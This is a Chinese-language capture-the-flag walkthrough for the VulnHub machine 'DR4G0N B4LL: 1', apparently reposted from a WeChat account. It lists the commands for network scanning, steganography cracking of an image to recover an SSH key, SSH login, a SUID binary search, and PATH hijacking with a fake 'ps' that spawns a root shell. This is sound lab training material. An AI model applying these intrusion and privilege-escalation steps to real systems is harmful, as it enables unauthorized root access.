DR4G0N B4LL: 1

下载地址：

http://www.vulnhub.com/entry/dr4g0n-b4ll-1,646/

虚拟机：VMware16

确定目标

确认目标IP地址

netdiscover -r 192.168.234.0/24

服务端口

nmap -v -T4 -A -p- -oN nmap.log 192.168.234.129

访问网页

网页打开无法加载css可能需要绑定域名然后在源代码里面发现了odin的域名绑定在hosts里面就好了

枚举网页服务器

192.168.234.129

检查网页源码

base64解码

查看robots.txt

使用base64解码

检查隐藏目录

将vulnhub里的jpg发送到本地机器

暴力破解密码

stegseek aj.jpg /home/kali/rockyou.txt

在aj.jpg.out中获得ssh密钥，要登录ssh先更改权限

在/login.html路径下找到用户名

登录ssh

ssh [email protected] -i id_rsa

权限提升

在home目录中找到user flag

ls -al

cat local.txt

进一步提升权限，寻找SUID二进制文件，找到shell的二进制文件

find / -perm -4000 -type f -exec ls -al {} ; 2>/dev/null

检查二进制文件的作用，它是二进制ps的副本，不能使用ps来提升权限，但是在同目录中有一个demo.c的源文件

cd script/

ls -al

./shell

在这里，我们可以观察到程序没有使用二进制文件的绝对路径。在这种情况下，它会查看环境变量PATH，而且，这会导致我们通过将具有相同名称的自定义二进制文件导出到路径来提升权限

创建了一个文件 ps，其内容为“/bin/bash”。然后，我使其可执行并将目录导出到 PATH。现在，如果我们在终端中使用单词“ps”检查调用的是什么，我们会得到这个自定义二进制文件

cd /tmp

echo "/bin/bash" > ps

chmod +x ps

export PATH=/tmp:$PATH

which ps

运行命令来获取 shell

~/script/shell

找到root flag

cd /root

ls -al

cat proof.txt

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

原文始发于微信公众号（无问之路）：DR4G0N B4LL: 1